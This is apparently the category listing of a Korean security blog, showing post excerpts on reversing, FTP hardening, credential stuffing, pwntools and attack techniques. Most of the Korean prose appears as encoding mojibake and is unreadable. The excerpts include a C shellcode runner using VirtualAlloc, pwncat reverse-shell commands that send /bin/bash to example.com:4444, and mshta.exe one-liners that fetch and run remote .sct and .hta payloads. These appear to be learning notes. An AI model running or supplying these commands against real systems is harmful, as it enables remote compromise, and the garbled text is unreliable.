๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

๐Ÿ”’์ •๋ณด๋ณด์•ˆ122

๋ฆฌ๋ฒ„์‹ฑ - ์˜จ๋ผ์ธ ์†Œ์Šค ์ฝ”๋“œ์—์„œ ์–ด์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ๋กœ ๋ณ€ํ™˜(godbolt.org) https://godbolt.org/ Compiler Explorer godbolt.org ์ฐธ๊ณ : https://www.youtube.com/watch?v=gPsYkV7-yJk 2023. 4. 17.
๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - FTP ์ ‘๊ทผ ์ œ์–ด ์„ค์ •(/etc/ftpusers) ๋ณด์•ˆ์— ์ทจ์•ฝํ•œ FTP๋Š” Bounce Attack, Anonymous FTP ๊ณต๊ฒฉ ๋“ฑ์— ์œ„ํ—˜ํ•จ์œผ๋กœ /etc/ftpusers์— root๋‚˜ daemon ๊ฐ™์€ ์ค‘์š” ๊ณ„์ •์€ FTP ์ง์ ‘ ์ ‘์†์— ์ œํ•œ์„ ํ•˜๋Š” ๊ฒƒ์ด ํ•„์š”ํ•˜๋‹ค. /etc/ftpusers # /etc/ftpusers: list of users disallowed FTP access. See ftpusers(5). root daemon bin sys sync games man lp mail news uucp nobody ์ ‘๊ทผ์„ ์ œํ•œ์‹œํ‚ฌ ์‚ฌ์šฉ์ž ์ด๋ฆ„์„ ์„ค์ • ํŒŒ์ผ์—๋‹ค ์ ์–ด์ค€๋‹ค. 2023. 4. 17.
์ •๋ณด๋ณด์•ˆ - ํฌ๋ฆฌ๋ด์…œ ์Šคํ„ฐํ•‘ ํฌ๋ฆฌ๋ด์…œ ์Šคํ„ฐํ•‘(Credential Stuffing)์€ ๊ธฐ์กด์— ๋‹ค๋ฅธ ๊ณณ์—์„œ ์œ ์ถœ๋œ ์•„์ด๋””์™€ ํŒจ์Šค์›Œ๋“œ๋ฅผ ์—ฌ๋Ÿฌ ์›น์‚ฌ์ดํŠธ๋‚˜ ์•ฑ์— ๋Œ€์ž…ํ•ด ๋กœ๊ทธ์ธ์ด ๋  ๊ฒฝ์šฐ, ๊ฐœ์ธ์ •๋ณด๋‚˜ ์ž๋ฃŒ๋ฅผ ์œ ์ถœํ•˜๋Š” ๋ฐฉ๋ฒ•์ด๋‹ค. ํฌ๋ฆฌ๋ด์…œ ์Šคํ„ฐํ•‘์ด ๋ฐœ์ƒํ•˜๋Š” ์ด์œ ๋Š” ์‚ฌ์šฉ์ž๋“ค์ด ์—ฌ๋Ÿฌ ์‚ฌ์ดํŠธ์— ๊ฐ™์€ ํฌ๋ฆฌ๋ด์…œ(ํŠนํžˆ ํŒจ์Šค์›Œ๋“œ)์„ ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค. ์—ฌ๋Ÿฌ ์„œ๋น„์Šค์™€ ์‚ฌ์ดํŠธ์— ๊ฑธ์ณ ๊ณ„์ •์„ ํ™•๋ณดํ•œ ๊ณต๊ฒฉ์ž๋Š” ๊ด‘๋ฒ”์œ„ํ•œ ์‚ฌ๊ธฐํ˜• ๋ฒ”์ฃ„๋ฅผ ์ €์ง€๋ฅผ ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค. ์ด๋•Œ ํ”ผํ•ด์ž๋Š” ๊ฐœ์ธ์ด ๋  ์ˆ˜๋„ ์žˆ์ง€๋งŒ, ๊ธฐ์—…์ด ๋  ์ˆ˜๋„ ์žˆ๋‹ค. https://m.boannews.com/html/detail.html?tab_type=1&idx=114255 [์นด๋“œ๋‰ด์Šค] ๋‹น์‹ ์˜ ๊ฐœ์ธ์ •๋ณด๋Š” ์•ˆ์ „ํ•œ๊ฐ€์š”? ‘ํฌ๋ฆฌ๋ด์…œ ์Šคํ„ฐํ•‘’ํฌ๋ฆฌ๋ด์…œ ์Šคํ„ฐํ•‘(Credential Stuffing)์€ ๊ธฐ์กด์— ๋‹ค๋ฅธ ๊ณณ์—์„œ .. 2023. 4. 16.
๋ฆฌ๋ฒ„์‹ฑ - ๋ฐ”์ด๋„ˆ๋ฆฌ์— ์„ค์ •๋œ ๋ณดํ˜ธ ๊ธฐ๋ฒ• ํ™•์ธ(checksec) checksec -f {ํŒŒ์ผ} RELRO(RELocation Read-Only): Read-Only ๊ถŒํ•œ ์„ค์ •์œผ๋กœ Write ๊ฐ€๋Šฅํ•œ์ง€ ์—ฌ๋ถ€ Stack Canary: Return Address Overwrite ์—ฌ๋ถ€ ํ™•์ธ Stack Canary๋Š” ์นด๋‚˜๋ฆฌ๋ฅผ ํ†ตํ•ด ์Šคํƒ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋ฅผ ๊ฐ์ง€ํ•œ๋‹ค. NX(No-eXecute): NX๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€์žฅ ๋Œ€ํ‘œ์ ์ธ ๋ฐฉ๋ฒ•์€ ROP(Return Oriented Programming) NX(No-eXecute)๋Š” ์‰˜์ฝ”๋“œ ์‹คํ–‰์„ ๋ฐฉ์ง€ํ•œ๋‹ค. ASLR(Address Space Layout Randomization): ์‹คํ–‰๋  ๋•Œ๋งˆ๋‹ค ๋ฐ์ดํ„ฐ ์˜์—ญ(์Šคํƒ, ํž™, ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ๋“ฑ)์˜ ์ฃผ์†Œ๋ฅผ ๋žœ๋ค์œผ๋กœ ๋ณ€๊ฒฝ Windows์šฉ checksec https://github.com/Wenzel/che.. 2023. 3. 26.
์‹œ์Šคํ…œ ๋ณด์•ˆ - pwntools pwntools๋Š” ๋ฆฌ๋ˆ…์Šค ํ™˜๊ฒฝ์—์„œ ์‹คํ–‰ ํ”„๋กœ๊ทธ๋žจ์˜ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์ž‘์„ฑํ•˜๋„๋ก ๋„์›€์„ ์ฃผ๋Š” ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์ด๋‹ค. CTF์—์„œ๋„ ์œ ์šฉํ•˜๊ฒŒ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ๋‹ค. pip ์„ค์น˜ ๋ช…๋ น์–ด python3 -m pip install --upgrade pwntools ์‚ฌ์šฉ ์˜ˆ์ œ >>> conn = remote('ftp.ubuntu.com',21) >>> conn.recvline() # doctest: +ELLIPSIS b'220 ...' >>> conn.send(b'USER anonymous\r\n') >>> conn.recvuntil(b' ', drop=True) b'331' >>> conn.recvline() b'Please specify the password.\r\n' >>> conn.close() nc(NetCat), .. 2023. 3. 25.
๋ฆฌ๋ฒ„์‹ฑ - ์œˆ๋„์šฐ ์‰˜์ฝ”๋“œ ์‹คํ–‰ C์–ธ์–ด ์†Œ์Šค #include #include int main(void){ char shellcode[] = {0x00,}; void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, sizeof shellcode); ((void(*)())exec)(); return 0; } 2023. 3. 23.
๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - Mullvad VPN ํฌํŠธํฌ์›Œ๋”ฉ์œผ๋กœ ์›น ์„œ๋ฒ„ ์™ธ๋ถ€์—์„œ ์ ‘์† Mullvad VPN ์‚ฌ์ดํŠธ: ๊ณ„์ • > ์žฅ์น˜ ํƒญ์—์„œ ๋‚ด ์žฅ์น˜ ํ™•์ธ ์ฃผ์†Œ: https://mullvad.net/ko/account/#/devices ๋‚ด ์žฅ์น˜์—์„œ "ํฌํŠธ ์ถ”๊ฐ€" ํด๋ฆญ ํฌํŠธํฌ์›Œ๋”ฉ ์„ค์ • ๋ฐฐ์ •๋œ ํฌํŠธ ๋ฒˆํ˜ธ ํ™•์ธ ๋‚˜๋ผ-๋„์‹œ-ํฌํŠธ๋ฒˆํ˜ธ ํ˜•์‹์ด๋ฉฐ ๋’ค์— ์ˆซ์ž ๋ฒˆํ˜ธ๊ฐ€ ์ง€์ •๋ฐ›์€ ๋‚ด ํฌํŠธ ๋ฒˆํ˜ธ์ด๋‹ค. Mullvad VPN ํ”„๋กœ๊ทธ๋žจ์—์„œ ํ†ฑ๋‹ˆ๋ฐ”ํ€ด(์„ค์ •) ํด๋ฆญ "VPN ์„ค์ •" ํด๋ฆญ ํ„ฐ๋„ ํ”„๋กœํ† ์ฝœ ํ•ญ๋ชฉ์—์„œ "OpenVPN"์„ ์„ ํƒ ๋ฐ˜๋“œ์‹œ VPN ์„œ๋ฒ„์˜ ์—ฐ๊ฒฐ๋œ ์œ„์น˜๊ฐ€ ํฌํŠธํฌ์›Œ๋”ฉ ํŽ˜์ด์ง€์—์„œ ์„ค์ •ํ•œ ์œ„์น˜๋ž‘ ์ผ์น˜ํ•˜๋Š”์ง€ ํ™•์ธ Mullvad VPN ์‚ฌ์ดํŠธ์—์„œ ํฌํŠธ ์ ‘์† ํ™•์ธํ•˜๊ธฐ ์ฃผ์†Œ: https://mullvad.net/ko/check ์ž์‹ ์˜ IPv4 ์ฃผ์†Œ๋ฅผ ์šฐ์„  ํ™•์ธ ๋ฐ”๋กœ ํ•˜๋‹จ์— "ํฌํŠธ ํ™•์ธ" ํƒญ์œผ๋กœ ๋“ค์–ด๊ฐ€ ๋ฐฉ๊ธˆ ์ „์— ํ™•์ธํ•œ ํฌ.. 2023. 3. 19.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - pwncat ๋ฆฌ๋ฒ„์Šค์‰˜ ๋ช…๋ น์–ด pip ์„ค์น˜ ๋ช…๋ น์–ด pip install pwncat victim(ํด๋ผ์ด์–ธํŠธ)์ด ๊ณต๊ฒฉ์ž(์„œ๋ฒ„) ์ ‘์†์„ ์œ„ํ•œ ์„ค์น˜ ๋ช…๋ น์–ด sudo pip install pwncat-cs ์œ„๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ python3 -m pwncat ๋ช…๋ น์–ด๋ฅผ ์“ฐ๊ธฐ ์œ„ํ•œ ์„ค์น˜ ๋ช…๋ น์–ด TCP Reverse shell(ํด๋ผ์ด์–ธํŠธ) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10์ดˆ๋งˆ๋‹ค ์žฌ์—ฐ๊ฒฐ ์‹œ๋„ ๊ณต๊ฒฉ์ž ๋ฆฌ๋ฒ„์Šค์‰˜ ์„œ๋ฒ„ ์˜คํ”ˆ python3 -m pwncat -lp 4444 pwncat ํ”„๋กฌํ”„ํŠธ ๋ช…๋ น์–ด / ๋‹จ์ถ•ํ‚ค sessions: ์—ฐ๊ฒฐ๋œ victim๋“ค ํ™•์ธ sessions {ID}: ์ƒํ˜ธ์ž‘์šฉ ํ•˜๋ ค๋Š” victi.. 2023. 3. 16.
์›น ํ•ดํ‚น - ๋ฆฌ๋ฒ„์Šค ์‰˜ ๋ช…๋ น์–ด ๋ชจ์Œ ์‚ฌ์ดํŠธ(revshells.com) https://www.revshells.com/ Online - Reverse Shell Generator Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs. www.revshells.com 2023. 3. 16.
๋„คํŠธ์›Œํฌ ๋ณด์•ˆ - ์•„์ดํ”ผ๋กœ ์•…์˜์ ์ธ ํ”ผํ•ด ์‚ฌ๋ก€ ๊ฒ€์ƒ‰(criminalip.io) https://www.criminalip.io/ko Cybersecurity Search Engine | Criminal IP Criminal IP is a Cyber Threat Intelligence Search Engine and Attack Surface Management(ASM) platform to find everything in Cybersecurity with impressive amount data capacities, API speed, and price. www.criminalip.io 2023. 3. 12.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ์œˆ๋„์šฐ MSHTA(Microsoft HTML Application) ๊ณต๊ฒฉ command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) ๊ฒฐ๊ณผ HTA(HTML Application) ๋ณด๋Š” ๊ฒƒ์ฒ˜๋Ÿผ ์œˆ๋„์šฐ์— ๊ธฐ๋ณธ์ ์œผ๋กœ ์„ค์น˜๋œ mshta.exe(Microsoft HTML Application)๋Š” ๋งˆ์น˜ ์›น ๋ธŒ๋ผ์šฐ์ €์ฒ˜๋Ÿผ ์™ธ๋ถ€์— ์žˆ๋Š” ์›น ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค. ์—ฌ๊ธฐ์„œ ๋ฌธ์ œ์ ์€ ์—ฌ๊ธฐ์— ๋‚ด์žฅ๋œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ธํ„ฐ๋„ท ์ต์Šคํ”Œ๋กœ๋Ÿฌ ๊ธฐ๋ฐ˜์ธ์ง€ ActiveXObject.. 2023. 2. 7.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ์‹คํ–‰ ํŒŒ์ผ์ด ์—†๋Š” ์šฐํšŒ ๊ธฐ๋ฒ•(ํŒŒ์ผ๋ฆฌ์Šค ๊ณต๊ฒฉ) "ํŒŒ์ผ๋ฆฌ์Šค"๋ผ๋Š” ์šฉ์–ด๋Š” ์ปดํ“จํ„ฐ์˜ ๋ฉ”๋ชจ๋ฆฌ์—๋งŒ ์žˆ๋Š” ๋ฐฑ๋„์–ด์™€ ๊ฐ™์€ ์œ„ํ˜‘์ด ํŒŒ์ผ์— ์ œ๊ณต๋˜์ง€ ์•Š์Œ์„ ์‹œ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ํŒŒ์ผ๋ฆฌ์Šค ๊ธฐ๋ฒ•์€ ๊ณต๊ฒฉ์ด ํƒ์ง€๋˜์ง€ ์•Š๊ฑฐ๋‚˜ ์ถ”์ ์ด ํž˜๋“ค๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋””์Šคํฌ์— ํŒŒ์ผ ํ˜•ํƒœ๋กœ ์กด์žฌํ•˜์ง€ ์•Š์•„ ์Šค์บ” ๋Œ€์ƒ์ด ๋˜์ง€๊ฐ€ ์•Š๋Š”๋‹ค. 2016๋…„๋„๋ถ€ํ„ฐ ํŒŒ์›Œ์‰˜์ด ํ™œ์šฉ์ด ๋œ ํŒŒ์ผ๋ฆฌ์Šค ๊ณต๊ฒฉ์ด ์ฆ๊ฐ€์„ธ๋ฅผ ๋ณด์˜€๋‹ค. ์˜ˆ์ œ 1) LNK ํŒŒ์ผ์„ ์ด์šฉํ•œ ํŒŒ์›Œ์…ธ ์› ๋ผ์ด๋„ˆ ์‹คํ–‰ ํ™”๋ฉด์— clickme๋ผ๋Š” ์ด๋ฆ„์˜ ๋ฌธ์„œ ํŒŒ์ผ์ฒ˜๋Ÿผ ๋ณด์ด๋Š” ํŒŒ์ผ์€ ์‚ฌ์‹ค LNK ํŒŒ์ผ์ด๋‹ค. ํŒŒ์ผ์˜ ์†์„ฑ์„ ์‚ดํŽด๋ณด๋ฉด ํŒŒ์›Œ์…ธ์ด ์‹คํ–‰๋˜๋„๋ก ๋“ฑ๋ก๋ผ ์žˆ๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋Š”๋ฐ, ์—๋””ํ„ฐ๋ฅผ ์ด์šฉํ•ด ํŒŒ์ผ์˜ ๋‚ด์šฉ์„ ์ž์„ธํžˆ ์‚ดํŽด๋ณด๋ฉด, ํŒŒ์›Œ์…ธ ์› ๋ผ์ด๋„ˆ๋ผ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. [๊ทธ๋ฆผ 7] clickme ๋ฌธ์„œ๋กœ ๋ณด์ด๋Š” LNK ํŒŒ์ผ ์˜ˆ์ œ 2) ์—‘์…€์„ ์ด์šฉํ•œ ํŒŒ์›Œ์…ธ ์› .. 2023. 2. 7.
728x90

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”